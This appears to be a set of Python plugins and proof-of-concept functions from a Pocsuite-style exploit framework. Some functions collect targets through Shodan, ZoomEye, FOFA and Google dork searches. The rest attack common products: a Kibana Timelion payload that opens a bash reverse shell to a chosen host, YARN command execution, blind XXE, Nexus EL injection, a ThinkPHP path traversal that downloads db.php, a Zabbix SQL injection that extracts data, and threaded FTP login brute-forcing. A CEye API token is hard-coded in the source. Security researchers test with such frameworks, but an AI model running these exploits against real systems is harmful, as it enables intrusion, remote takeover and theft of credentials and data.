def init(self):
    """Seed the target list from one or more CIDR ranges.

    The CIDR source is chosen in priority order: the ``CIDR`` environment
    variable, then the URLs already given on the command line (which are
    consumed and cleared), and finally an interactive prompt. Every host
    address of each valid network is registered via ``add_target``;
    malformed entries are logged and skipped.
    """
    logger.info("[PLUGIN] try fetch targets from CIDR...")

    cidr_set = set()
    if "CIDR" in os.environ:
        cidr_set.add(os.environ.get("CIDR"))
    elif conf.url:
        # Reinterpret the positional URLs as CIDR ranges and consume them so
        # they are not also treated as plain URLs later.
        cidr_set.update(conf.url)
        conf.url = []
    else:
        cidr_set.add(input("Please input CIDR address:"))

    added = 0
    for entry in cidr_set:
        try:
            network = ip_network(entry, strict=False)
            for host in network.hosts():
                self.add_target(host.exploded)
                added += 1
        except ValueError:
            logger.error("[PLUGIN] error format from " + entry)

    logger.info("[PLUGIN] get {0} target(s) from CIDR".format(added))
def init(self):
    """Populate targets from a ZoomEye search.

    Uses ``conf.dork_zoomeye`` when set, otherwise ``conf.dork``; raises
    ``PocsuitePluginDorkException`` when neither is configured. Only
    targets that ``add_target`` accepts are counted.
    """
    self.init_zoomeye_api()

    dork = conf.dork_zoomeye if conf.dork_zoomeye else conf.dork
    if not dork:
        raise PocsuitePluginDorkException(
            "Need to set up dork (please --dork or --dork-zoomeye)")

    logger.info(
        "[PLUGIN] try fetch targets from zoomeye with dork: {0}".format(dork))

    hits = self.zoomeye.search(dork, conf.max_page, resource=conf.search_type)
    added = 0
    for hit in hits or ():
        if self.add_target(hit):
            added += 1

    logger.info("[PLUGIN] get {0} target(s) from zoomeye".format(added))
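def _verify(self):
    """Check for unauthenticated YARN ResourceManager application submission.

    Requests a new application id, submits an application whose container
    command pings a unique DNS-logging hostname, then polls the CEye DNS
    record API for that hostname. A hit records the URL and payload in
    ``result['VerifyInfo']``; any exception is logged at info level and
    yields an empty result.

    Returns:
        Whatever ``parse_output`` produces for the collected ``result``.
    """
    result = {}
    payload = random_str(16) + '.6eb4yw.ceye.io'
    cmd = 'ping ' + payload
    try:
        # Normalise the base so the REST paths join with exactly one slash.
        base = self.url if self.url.endswith('/') else self.url + '/'
        new_app_url = base + 'ws/v1/cluster/apps/new-application'
        submit_url = base + 'ws/v1/cluster/apps'

        app_id = requests.post(url=new_app_url).json()['application-id']
        data = {
            'application-id': app_id,
            'application-name': 'get-shell',
            'am-container-spec': {
                'commands': {
                    'command': cmd,
                },
            },
            'application-type': 'YARN',
        }
        requests.post(url=submit_url, json=data)

        # NOTE(review): the CEye API token is hard-coded in source; it should
        # be loaded from configuration so it is not committed or shared.
        res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
        # The original tested ``payload in res`` against the Response object,
        # which can never match a string; the DNS log is in the body text.
        if payload in res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)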
def init(self):
    """Populate targets from a FOFA crawler search.

    Prefers ``conf.dork_fofac`` over ``conf.dork``; records the dork and each
    returned target in ``kb.comparison`` when that facility is enabled.
    """
    self.init_fofa_crawler()

    dork = conf.dork_fofac or conf.dork
    if not dork:
        raise PocsuitePluginDorkException(
            "Need to set up dork (please --dork or --dork-fofac)")

    if kb.comparison:
        kb.comparison.add_dork("Fofac", dork)

    logger.info(
        "[PLUGIN] try fetch targets from fofa with dork: {0}".format(dork))

    added = 0
    for target in self.fofac.search(dork) or ():
        if kb.comparison:
            kb.comparison.add_ip(target, "Fofa")
        if self.add_target(target):
            added += 1

    logger.info("[PLUGIN] get {0} target(s) from FOfac".format(added))
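def _attack(self):
    """Fetch a file through the Database/downFile path traversal.

    The ``filename`` option (defaulting to a ``db.php`` path under
    ``App/Common/Conf``) has its forward slashes rewritten to doubled
    backslashes before being embedded in the traversal path; the request
    carries the ``PHPSESSID`` option as a session cookie. A 200 response
    whose body lacks the JobManager "does not exist" marker is recorded,
    body included, in ``result['VerifyInfo']``.

    Returns:
        ``parse_output`` applied to the collected ``result``.
    """
    result = {}
    try:
        not_found_marker = "This file does not exist in JobManager log dir"
        wanted = self.get_option("filename")
        if wanted:
            attack_filename = wanted.replace('/', '\\\\')
        else:
            attack_filename = 'App\\Common\\Conf\\db.php'
        logger.info("下载文件为:" + attack_filename)

        attack_payload = ('/xyhai.php?s=/Database/downFile/file/..\\..\\..\\'
                          + attack_filename + '/type/zip')
        attack_url = self.url + attack_payload
        logger.info(attack_url)

        cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
        # verify=False: certificate checking is deliberately off for this
        # request, so TLS errors on the target do not abort the check.
        attack_res = requests.get(attack_url, cookies=cookies, verify=False)
        if attack_res.status_code == 200:
            # Decode once; the body is both tested and stored.
            body = attack_res.content.decode()
            if not_found_marker not in body:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = attack_url
                result['VerifyInfo']['Payload'] = attack_payload
                result['VerifyInfo']['File_Content'] = '\n' + body
    except Exception as e:
        # logger.warn is a deprecated alias of logger.warning
        logger.warning(str(e))
    return self.parse_output(result)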
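def _verify(self):
    """Probe for blind XXE via an out-of-band callback.

    Builds an XML body whose external parameter entity points at a unique
    path under the CEye subdomain, posts it as XML to ``self.url``, and asks
    CEye whether that path was requested. A confirmed callback stores the
    URL and payload in ``result['VerifyInfo']``; request errors are logged
    only.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    ceye = CEye(token=self.token)
    ceye_subdomain = ceye.getsubdomain()
    random_uri = random_str(16)
    logger.info("random_url为:%s" % random_uri)

    # ``%%`` yields a literal ``%`` for the parameter-entity syntax.
    verify_payload = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% xxe SYSTEM "http://%s/%s"> %%xxe; ]>""" % (ceye_subdomain, random_uri)
    logger.warning(verify_payload)
    veri_url = self.url
    logger.warning(veri_url)

    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "SOAPAction": "aaa",
    }
    try:
        # The response body is not inspected: success is judged by the
        # callback alone, so the unused ``resp`` local was dropped.
        requests.post(veri_url, data=verify_payload, headers=headers)
        if ceye.verify_request(random_uri):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = veri_url
            result['VerifyInfo']['Payload'] = verify_payload
    except Exception as e:
        # logger.warn is a deprecated alias of logger.warning
        logger.warning(str(e))
    return self.parse_output(result)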
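def init(self):
    """Open the record file for appending, refusing to clobber an existing one.

    Raises:
        FileExistsError: if ``self.filename`` already exists. This is a
            subclass of ``Exception`` (which the original raised), so
            existing ``except Exception`` handlers still apply.
    """
    logger.debug("[PLUGIN] file_record plugin init...")
    logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename))
    if os.path.exists(self.filename):
        raise FileExistsError("The {} has existed".format(self.filename))
    # The handle is kept on the instance; closing it is not done here.
    self.file = open(self.filename, 'a+')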
def init(self):
    """Populate targets from a Shodan search.

    Prefers ``conf.dork_shodan`` over ``conf.dork``; with ``conf.dork_b64``
    the dork is base64-decoded first. The dork and each target are mirrored
    into ``kb.comparison`` when that facility is enabled.
    """
    self.init_shodan_api()

    dork = conf.dork_shodan or conf.dork
    if not dork:
        raise PocsuitePluginDorkException(
            "Need to set up dork (please --dork or --dork-shodan)")

    if conf.dork_b64:
        import base64
        dork = base64.b64decode(dork).decode("utf-8")

    if kb.comparison:
        kb.comparison.add_dork("Shodan", dork)

    logger.info("[PLUGIN] try fetch targets from shodan with dork: {0}".format(dork))

    hits = self.shodan.search(dork, conf.max_page, resource=conf.search_type)
    added = 0
    for target in hits or ():
        if kb.comparison:
            kb.comparison.add_ip(target, "Shodan")
        if self.add_target(target):
            added += 1

    logger.info("[PLUGIN] get {0} target(s) from shodan".format(added))
def init(self):
    """Populate targets from a Censys search.

    Prefers ``conf.dork_censys`` over ``conf.dork``; with ``conf.dork_b64``
    the dork is base64-decoded first. ``conf.search_type == "web"`` selects
    the ``websites`` index, anything else ``ipv4``.
    """
    self.init_censys_api()

    dork = conf.dork_censys or conf.dork
    if not dork:
        raise PocsuitePluginDorkException(
            "Need to set up dork (please --dork or --dork-censys)")

    if conf.dork_b64:
        import base64
        dork = base64.b64decode(dork).decode("utf-8")

    if kb.comparison:
        kb.comparison.add_dork("Censys", dork)

    logger.info("[PLUGIN] try fetch targets from censys with dork: {0}".format(dork))

    index = "websites" if conf.search_type == "web" else "ipv4"
    hits = self.censys.search(dork, conf.max_page, resource=index)

    added = 0
    for target in hits or ():
        if kb.comparison:
            kb.comparison.add_ip(target, "Censys")
        if self.add_target(target):
            added += 1

    logger.info("[PLUGIN] get {0} target(s) from Censys".format(added))
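def init(self):
    """Populate targets from a Google search.

    Each hit is reduced to ``scheme://netloc``, Google's own origin is
    dropped, and duplicates are removed before the origins are added as
    targets (mirrored into ``kb.comparison`` when enabled).
    """
    self.google = Google()

    dork = conf.dork_google or conf.dork
    if not dork:
        raise PocsuitePluginDorkException(
            "Need to set up dork (please --dork or --dork-google)")

    if kb.comparison:
        kb.comparison.add_dork("Google", dork)

    logger.info(
        "[PLUGIN] try fetch targets from google with dork: {0}".format(dork))

    origins = []
    # The original iterated ``targets`` a second time even when search()
    # returned None, which raised TypeError; guard once here instead.
    for hit in self.google.search(dork) or ():
        parsed = urlparse(hit)
        origin = parsed.scheme + "://" + parsed.netloc
        if origin != 'https://www.google.com':
            origins.append(origin)
    # dict.fromkeys de-duplicates while keeping first-seen order, so the
    # order in which targets are added is deterministic (list(set()) was not).
    origins = list(dict.fromkeys(origins))

    added = 0
    for origin in origins:
        if kb.comparison:
            kb.comparison.add_ip(origin, "Google")
        if self.add_target(origin):
            added += 1

    logger.info("[PLUGIN] get {0} target(s) from google".format(added))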
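def task_thread():
    """Worker: drain ``task_queue`` trying FTP logins until one succeeds.

    Each item is ``(host, port, username, password)``. On the first
    successful ``ftp_login`` the remaining work is discarded so sibling
    workers stop, and the credential pair is pushed to ``result_queue``.
    """
    from queue import Empty

    while True:
        try:
            # empty()-then-get() raced with other workers: the last item could
            # be taken in between and get() would then block forever.
            host, port, username, password = task_queue.get_nowait()
        except Empty:
            return
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if ftp_login(host, port, username, password):
            # Clearing the underlying deque under the queue's own lock empties
            # the work for every worker.
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))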
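def test_EL(self, p_resp):
    """Report whether the EL expression was evaluated in the response.

    The expected product ``self.ran_sum`` is looked for in
    ``p_resp.json()[0]['message']``. JSON decoding and lookup errors are
    deliberately left to propagate, because the caller distinguishes a
    non-JSON (e.g. 401) reply from other failures. A non-string message
    cannot contain the marker and yields False; the original fell off the
    end and returned None on a miss.

    Args:
        p_resp: the HTTP response object to inspect.

    Returns:
        bool
    """
    d = p_resp.json()
    result = d[0]['message']
    logger.info(result)
    try:
        return str(self.ran_sum) in result
    except Exception:
        return False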
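def test_EL(self, p_resp):
    """Report whether the EL expression was evaluated in the response.

    The expected product ``self.ran_sum`` is looked for in
    ``p_resp.json()['result']['errors']['roles']``. JSON decoding and key
    errors are deliberately left to propagate, because the caller
    distinguishes a non-JSON (e.g. 401) reply from other failures. A value
    that does not support ``in`` yields False; the original fell off the
    end and returned None on a miss.

    Args:
        p_resp: the HTTP response object to inspect.

    Returns:
        bool
    """
    d = p_resp.json()
    result = d['result']['errors']['roles']
    logger.info(result)
    try:
        return str(self.ran_sum) in result
    except Exception:
        return False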
def _verify(self):
    """Check whether the ``coreui_User.create`` RPC evaluates EL in role names.

    A user-creation request is sent whose role name is an EL expression
    multiplying ``self.ran1`` and ``self.ran2``; ``test_EL`` then looks for
    the product in the response. Each header set from ``get_auth_headers``
    is tried in turn, but note the unconditional ``return`` inside the
    ``try``: a further credential is only attempted when the reply is not
    JSON (the ``JSONDecodeError`` branch ``continue``s).

    Returns:
        ``save_output`` applied to ``result``; any error other than a JSON
        decode failure is logged and re-raised.
    """
    result={}
    vul_url = self.url
    target_url = vul_url + "/service/extdirect"
    j = {
        "action":"coreui_User",
        "method":"create",
        "data": [
            {
                "userId": "shadowsock5",
                "firstName": "77",
                "lastName": "ss",
                "password": "******",
                "email": "*****@*****.**",
                "status": "active",
                "roles": [
                    "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
                ]
            }
        ],
        "type":"rpc","tid":4}
    resp = None  # response of the most recent request
    l_auth_headers = self.get_auth_headers()
    for auth_header in l_auth_headers:
        # merge the auth header into the request headers
        self.headers.update(auth_header)
        # refresh the CSRF token
        self.headers.update(self.h)
        try:
            # send the payload request
            resp = req.post(target_url, json=j, headers=self.headers)  # , proxies={'http': 'http://127.0.0.1:8087'})
            if self.test_EL(resp):
                # the JSON field in the response shows the EL expression was evaluated
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                return self.save_output(result)
            return self.save_output(result)
        except json.decoder.JSONDecodeError as e:
            if resp.status_code == 401:
                pass  # print("authentication failed")
            else:
                logger.info("json解析失败")
            # the failure may just be a wrong password; continue with the next one
            continue
        except Exception as e:
            logger.error(e)
            raise e
def init_zoomeye_api(self):
    """Log in to ZoomEye with the configured credentials and report the quota.

    On a failed ``get_resource_info`` the failure is logged as an error and
    ``self.zoomeye`` is still left assigned.
    """
    self.zoomeye = ZoomEye(username=conf.login_user, password=conf.login_pass)
    if not self.zoomeye.get_resource_info():
        logger.error("[PLUGIN] ZoomEye login faild")
        return
    logger.info(
        "[PLUGIN] ZoomEeye search limit {0}".format(self.zoomeye.resources))
def _verify(self):
    """Verification routine for the Kibana Timelion check.

    Reads ``kbn-version`` from ``/app/kibana`` (empty when absent), then
    posts a Timelion sheet built from the ``ncip``/``ncport`` options to
    ``/api/timelion/run``. A 200 reply containing ``invokeTime`` is treated
    as confirmation and the URL is recorded in ``result['VerifyInfo']``.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    output = Output(self)
    kibana_path = self.url + "/app/kibana"
    path1 = self.url + "/app/timelion"
    print(path1)
    path2 = self.url + "/api/timelion/run"

    nc_ip = self.get_option("ncip")
    nc_port = self.get_option("ncport")
    sheet = (
        ".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"bash -i >& "
        "/dev/tcp/" + nc_ip + "/" + nc_port + " 0>&1\");process.exit()//')\n.props("
        "label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"
    )
    payload = {
        "sheet": [sheet],
        "time": {
            "from": "now-15m",
            "to": "now",
            "mode": "quick",
            "interval": "auto",
            "timezone": "Asia/Shanghai",
        },
    }

    resp = requests.get(kibana_path, verify=False, timeout=20)
    try:
        kbn_version = resp.headers['kbn-version']
    except Exception as e:
        logger.info(e)
        kbn_version = ''

    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
        'Accept': 'application/json, text/plain, */*',
        "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        'Connection': 'close',
        'kbn-version': kbn_version,
        'Content-Type': 'application/json;charset=UTF-8',
    }
    run_resp = requests.post(path2, headers=header, data=json.dumps(payload), verify=False, timeout=30)
    if run_resp.status_code == 200 and 'invokeTime' in run_resp.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['VerifyInfo']['Referer'] = ""
    return self.parse_output(result)
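def _verify(self):
    """Run ``self.check`` against the host and port derived from the options.

    The host is everything after ``//`` in ``self.url`` (NOTE(review): a
    ``:port`` suffix in the URL would stay part of this string — confirm
    callers pass a bare host). The port comes from the ``port`` option,
    falling back to 1099 when it is unset, empty or 0; the original
    ``int(option) or 1099`` raised on an unset option, which the broad
    ``except`` then turned into a silently skipped check.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    try:
        ip = self.url.split('//')[1]
        raw_port = self.get_option('port')
        port = (int(raw_port) if raw_port else 0) or 1099
        if self.check(ip, port):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = ip
            result['VerifyInfo']['Info'] = 'the target exist vulnerability'
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)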
def _verify(self):
    """Check whether the Go group repository API evaluates EL in member names.

    A group-repository creation request is sent whose member name is an EL
    expression multiplying ``self.ran1`` and ``self.ran2``; ``test_EL`` then
    looks for the product in the response. Each header set from
    ``get_auth_headers`` is tried in turn, but note the unconditional
    ``return`` inside the ``try``: a further credential is only attempted
    when the reply is not JSON (the ``JSONDecodeError`` branch ``continue``s).
    On a hit the credential header that worked is stored alongside the URL.

    Returns:
        ``save_output`` applied to ``result``; any error other than a JSON
        decode failure is logged and re-raised.
    """
    result={}
    vul_url = self.url
    target_url = vul_url + "/service/rest/beta/repositories/go/group"
    j = {
        "name": "internal",
        "online": "true",
        "storage": {
            "blobStoreName": "default",
            "strictContentTypeValidation": "true"
        },
        "group": {
            "memberNames": [
                "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
            ]
        }
    }
    resp = None  # response of the most recent request
    l_auth_headers = self.get_auth_headers()
    for auth_header in l_auth_headers:
        # merge the auth header into the request headers
        self.headers.update(auth_header)
        # refresh the CSRF token
        self.headers.update(self.h)
        try:
            # send the payload request
            resp = req.post(target_url, json=j, headers=self.headers)  # , proxies={'http': 'http://127.0.0.1:8087'})
            if self.test_EL(resp):
                # the JSON field in the response shows the EL expression was evaluated
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['Credentials'] = auth_header
                return self.save_output(result)
            return self.save_output(result)
        except json.decoder.JSONDecodeError as e:
            if resp.status_code == 401:
                pass  # print("authentication failed")
            else:
                logger.info("json解析失败")
            # the failure may just be a wrong password; continue with the next one
            continue
        except Exception as e:
            logger.error(e)
            raise e
def _verify(self):
    """Run the heartbeat check against the target host on port 443.

    The host is everything after ``//`` in ``self.url``; it is passed to
    ``check_heardbeat`` as bytes. Errors are logged at info level and leave
    ``result`` empty.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    try:
        host = self.url.split('//')[1]
        if self.check_heardbeat(host=host.encode(), port=443):
            result['VerifyInfo'] = {
                'URL': host,
                'INFO': 'target %s vulnerability' % host,
            }
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)
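def _verify(self):
    """Check whether ``/info`` answers 200 with a non-empty body.

    Any exception is logged at info level and leaves ``result`` empty.

    Returns:
        ``parse_output`` applied to ``result``. The original called
        ``self.parse_ouput`` (typo), which does not match the method name used
        by every sibling check and would raise AttributeError at runtime.
    """
    result = {}
    try:
        url = self.url + "/info"
        res = requests.get(url)
        if res.status_code == 200 and res.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Payload'] = url
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)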
def init(self):
    """Load every PoC script found under the local pocsuite PoC directory.

    Walks ``paths.POCSUITE_POCS_PATH`` recursively, picks ``*.py`` files
    that do not start with ``__``, and logs each ``add_poc_from_file``
    success or failure.
    """
    poc_files = []
    for root, _dirs, files in os.walk(paths.POCSUITE_POCS_PATH):
        poc_files.extend(
            os.path.join(root, name)
            for name in files
            if not name.startswith("__") and name.endswith(".py")
        )

    for poc_file in poc_files:
        if self.add_poc_from_file(poc_file):
            info_msg = "[PLUGIN] load PoC script '{0}' from seebug success".format(poc_file)
        else:
            info_msg = "[PLUGIN] load PoC script '{0}' from seebug failed".format(poc_file)
        logger.info(info_msg)
def _verify(self):
    """Check ``latest.php`` for the ``toggle_ids`` injection marker.

    Appends the fixed payload to ``self._get_url`` and treats
    ``web.latest.toggle`` in the response body as confirmation. Request
    errors are logged at info level and leave ``result`` empty.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    payload = 'latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1'
    try:
        response = requests.get(self._get_url + payload)
        if 'web.latest.toggle' in response.text:
            result['VerifyInfo'] = {
                'URL': self.url,
                'Payload': payload,
            }
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)
def _verify(self):
    """Check whether the dashboard view is reachable at the target.

    The original spelled the path as a run of ``\\x..`` escapes; it is the
    same bytes as the plain string below. ``Dashboard`` in the response
    body is treated as confirmation; request errors are logged at info
    level and leave ``result`` empty.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    payload = '/zabbix/zabbix.php?action=dashboard.view&dashboardid=1'
    try:
        response = requests.get(url=self._get_url + payload, headers=self._headers)
        if 'Dashboard' in response.text:
            result['VerifyInfo'] = {
                'URL': self.url,
                'Payload': payload,
            }
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)
def _verify(self):
    """Check for the vROps plugin ``uploadova`` endpoint.

    Resolves host/port from the URL via ``url2ip``, returns ``None`` when
    the port is closed, and treats a 405 on
    ``/ui/vropspluginui/rest/services/uploadova`` as a hit. A request
    failure is printed and re-raised.

    Returns:
        ``save_output`` applied to ``result`` (or ``None`` on a closed port).
    """
    result = {}
    vul_url = self.url
    host, port = url2ip(vul_url, True)
    logger.info("检查端口开放情况...")
    # Nothing to check when the port is closed; bail out without a result.
    if not self.is_port_open(host, port):
        logger.info("端口不开放! 退出!")
        return
    logger.info("端口开放... 继续")
    target_url = "{0}/ui/vropspluginui/rest/services/uploadova".format(vul_url)
    try:
        resp = req.get(target_url, verify=False)
    except Exception as e:
        print(e)
        raise e
    if resp.status_code != 405:
        logger.info(resp)
        return self.save_output(result)
    result['VerifyInfo'] = {'URL': target_url}
    return self.save_output(result)
def _attack(self):
    """Request the Jolokia logback ``reloadByURL`` operation with a loopback URL.

    On a 200 reply the response body is stored under
    ``result['ShellInfo']['Content']``.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    payload = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml"
    vul_url = self.url + payload
    logger.info("url: {}".format(vul_url))
    response = requests.get(
        vul_url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    if response.status_code == 200:
        result['ShellInfo'] = {'Content': response.text}
    return self.parse_output(result)
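def ftp_burst(host, port):
    """Drive the FTP login attempts for one ``host:port``.

    Skips hosts whose port is closed, records an anonymous login straight
    away when it works, and otherwise fills the task queue and runs four
    ``task_thread`` workers over it. Errors from the threaded run are logged
    at debug level instead of being silently swallowed, so a failing host
    no longer hides its cause while the scan continues.
    """
    if not port_check(host, port):
        return
    if anonymous_login(host, port):
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, 'anonymous', '<empty>'))
        result_queue.put(('anonymous', '<empty>'))
        return
    try:
        task_init(host, port)
        run_threads(4, task_thread)
    except Exception as e:
        # Best-effort: keep going with other hosts, but record the reason.
        logger.debug('ftp burst {}:{} aborted: {}'.format(host, port, e))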
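def _verify(self):
    """Look for exposed ThinkPHP runtime log files.

    For each supported major version (3 then 5) the candidate log
    directories are combined with the filenames from ``getTPLogFilename``;
    the first URL that answers 200 with ``INFO`` in the body is recorded and
    returned immediately. Connection failures are logged and skipped. The
    original duplicated the whole loop body per version; it is now a single
    loop over ``log_path_list`` (insertion order preserved).

    Returns:
        ``parse_attack`` applied to ``result``.
    """
    result = {}
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
    }
    log_path_list = {
        '3': ['/Runtime/Logs/', '/App/Runtime/Logs/', '/Application/Runtime/Logs/Admin/',
              '/Application/Runtime/Logs/Home/', '/Application/Runtime/Logs/'],
        '5': ['/runtime/log/'],
    }
    base = self.url.rstrip('/')
    for version, dirs in log_path_list.items():
        # Computed once per version; the original recomputed it per directory.
        filename_list = self.getTPLogFilename(int(version))
        for temppath in dirs:
            for filename in filename_list:
                vulurl = "{}{}".format(base, temppath + filename)
                logger.info("Scan {}".format(vulurl))
                try:
                    resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False)
                    if "INFO" in resp.text and resp.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['url'] = vulurl
                        return self.parse_attack(result)
                except Exception:
                    logger.error("connect target '{} failed!'".format(vulurl))
    return self.parse_attack(result)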
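def _sql_inject(self, sql):
    """Send ``sql`` through the ``jsrpc.php`` ``profileIdx2`` parameter.

    The SQL text is URL-quoted into the request and the captured value is
    pulled back out of the ``Duplicate entry '~...~1'`` error message in
    the response.

    Args:
        sql: the SQL fragment to embed.

    Returns:
        The first captured value as a string, or ``False`` when nothing
        matched or the request failed (errors are logged at info level).
    """
    # ``&timestamp`` had been mangled to ``×tamp`` (an HTML ``&times``
    # entity rendered as a character) in the copy under review; restored.
    payload = ("jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2="
               + parse.quote(sql)
               + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1")
    if self.url.endswith('/'):
        url = self.url + payload
    else:
        url = self.url + '/' + payload
    try:
        reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
        response = requests.get(url, timeout=10)
        found = reg.findall(response.text)
        if found:
            return found[0]
    except Exception as e:
        logger.info(e)
    return False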
def _verify(self):
    """Check whether the ws_utc general settings path is reachable.

    Any status other than 404 is treated as a hit and the URL and path are
    recorded. Request errors are logged at info level and leave ``result``
    empty.

    Returns:
        ``parse_output`` applied to ``result``.
    """
    result = {}
    payload = 'ws_utc/resources/setting/options/general'
    try:
        separator = '' if self.url[-1] == '/' else '/'
        response = requests.get(url=self.url + separator + payload, headers=self._headers)
        if response.status_code != 404:
            result['VerifyInfo'] = {
                'URL': self.url,
                'Payload': payload,
            }
    except Exception as e:
        logger.info(e)
    return self.parse_output(result)
def init(self):
    """Populate targets from the ``pocsuite_target`` key in redis, if reachable.

    Does nothing when ``get_redis`` returns a falsy connection.
    """
    conn = self.get_redis()
    if not conn:
        return

    logger.info("[PLUGIN] try fetch targets from redis...")
    # NOTE(review): a single GET value is iterated here element by element —
    # TODO confirm how the key is populated and what each element is.
    targets = conn.get('pocsuite_target')

    added = 0
    for target in targets or ():
        if self.add_target(target):
            added += 1

    logger.info("[PLUGIN] get {0} target(s) from redis".format(added))